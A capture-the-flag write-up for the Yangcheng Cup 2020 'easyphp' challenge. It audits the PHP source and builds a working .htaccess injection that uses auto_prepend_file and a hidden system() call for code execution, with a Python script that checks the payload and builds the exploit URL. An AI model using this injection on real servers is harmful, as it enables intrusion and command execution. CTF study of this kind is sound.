[Yangcheng cup 2020] easyphp
2022-07-02 23:02:00 【-Gardenia blue-】
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nHello, world");
?>
Code audit
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
On every request, every regular file in the current directory except index.php is deleted before anything else happens.
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
If either the content or the filename parameter is missing, the script prints its own source (highlight_file) and dies.
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
The content parameter is filtered. stristr() is case-insensitive, so content may not contain on, html, type, flag, upload or file in any letter case. Note that file alone rules out writing auto_prepend_file literally, and flag rules out naming the flag file directly.
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
The filename parameter is filtered: it may consist only of lowercase letters and dots (no digits, slashes or underscores), otherwise the script dies. A name such as .htaccess passes this check.
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
Same cleanup as at the top: everything except index.php is deleted again, immediately before the write, so only the file we are about to write survives.
file_put_contents($filename, $content . "\nHello, world");
Our content is written to filename, but with "\nHello, world" appended. That trailing line has to be dealt with: in a .htaccess it is not a valid directive, so Apache would reject the whole file and answer with a 500 error.
The first idea was filename=a.php with a one-line webshell as content. Trying it, the .php file was returned to the browser as plain text and never parsed; apparently only index.php is handled by PHP. Since the script goes out of its way to keep index.php, the next thought was to make index.php pull in our file by way of .htaccess, i.e. change a PHP configuration directive. A more experienced player confirmed that .htaccess is indeed the way to the flag.
php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fla?');?>\
In .htaccess a trailing backslash continues the directive on the next line, so Apache reads the first two lines as php_value auto_prepend_file .htaccess. The word file is split across the continuation because the content filter rejects anything containing file.
The third line starts with #, which Apache treats as a comment. But auto_prepend_file makes PHP include .htaccess as a script before index.php, and PHP does execute the <?php system('cat /fla?');?> embedded in that comment (flag is filtered too, so the shell glob fla? is used; it expands to /flag).
The backslash at the end of the third line joins the appended "Hello, world" onto the comment line. Without it, "Hello, world" would stand alone as a fourth line, Apache could not parse it as a directive, and the request would fail with a 500.
Two things worth knowing before sending it: php_value is only honoured by mod_php (PHP running as an Apache module, with overrides allowed for the directory), and although index.php deletes .htaccess at the start of the next request, Apache has already applied the directive by then, so the output of system() shows up in the response to that very next request.
?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C
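To make the two halves of this trick checkable offline, here is an added example (not part of the original writeup or of the challenge) that ports the two filters from index.php to Python, models what file_put_contents() actually writes, and then reads the written file the way both consumers do: Apache (joining backslash-continued lines, dropping # comments) and PHP (running only what sits inside <?php ... ?>). The Apache line joiner is a simplification that ignores whitespace compression, and the host in exploit_url() is hypothetical.

```python
import re
import urllib.parse

# Blacklist ported from the challenge's stristr() chain (see the source above).
CONTENT_BLACKLIST = ("on", "html", "type", "flag", "upload", "file")


def content_allowed(content: str) -> bool:
    """Port of the stristr() chain: any case-insensitive hit means 'Hacker'."""
    lowered = content.lower()
    return not any(word in lowered for word in CONTENT_BLACKLIST)


def filename_allowed(filename: str) -> bool:
    """Port of preg_match("/[^a-z\\.]/", $filename): only a-z and '.' pass."""
    return re.search(r"[^a-z.]", filename) is None


def written_file(content: str) -> str:
    """What file_put_contents() really writes: content plus "\\nHello, world"."""
    return content + "\nHello, world"


def apache_logical_lines(text: str) -> list:
    """Simplified model of Apache's config reader (assumption: whitespace
    compression is ignored): a line ending in '\\' is joined with the next
    line and the backslash is removed."""
    lines, pending = [], ""
    for raw in text.split("\n"):
        if raw.endswith("\\"):
            pending += raw[:-1]
            continue
        lines.append(pending + raw)
        pending = ""
    if pending:
        lines.append(pending)
    return lines


def apache_directives(text: str) -> list:
    """Logical lines Apache would try to parse as directives
    (blank lines and '#' comment lines dropped)."""
    return [ln for ln in apache_logical_lines(text)
            if ln.strip() and not ln.lstrip().startswith("#")]


def php_code_segments(text: str) -> list:
    """What PHP executes when the file is auto-prepended: the bodies of the
    <?php ... ?> blocks; everything outside them is just echoed."""
    return [seg.strip() for seg in re.findall(r"<\?php(.*?)\?>", text, re.S)]


# Payload from the writeup: 'file' split by a continuation, and a trailing
# backslash on the comment line so the appended 'Hello, world' is swallowed.
PAYLOAD = "php_value auto_prepend_fil\\\ne .htaccess\n#<?php system('cat /fla?');?>\\"
# Same payload without the final backslash, to show why it is needed.
PAYLOAD_NO_TRAIL = PAYLOAD[:-1]


def check_payload(content: str, filename: str = ".htaccess") -> dict:
    """Run a candidate through the filters and through both readers of the file."""
    on_disk = written_file(content)
    return {
        "passes_filters": content_allowed(content) and filename_allowed(filename),
        "apache_directives": apache_directives(on_disk),
        "php_code": php_code_segments(on_disk),
    }


def exploit_url(base: str = "http://target.example/index.php") -> str:
    """Build the GET request (hypothetical host); urlencode produces %5C and %0A."""
    query = urllib.parse.urlencode({"filename": ".htaccess", "content": PAYLOAD})
    return base + "?" + query


if __name__ == "__main__":
    for name, candidate in (("payload", PAYLOAD),
                            ("no trailing backslash", PAYLOAD_NO_TRAIL)):
        print(name, check_payload(candidate))
    print(exploit_url())
```

Running it shows the payload passing both filters, Apache seeing exactly one directive (php_value auto_prepend_file .htaccess), PHP seeing exactly one statement (system('cat /fla?');), and the variant without the final backslash leaking "Hello, world" into Apache's directive list, which is the 500 the writeup warns about.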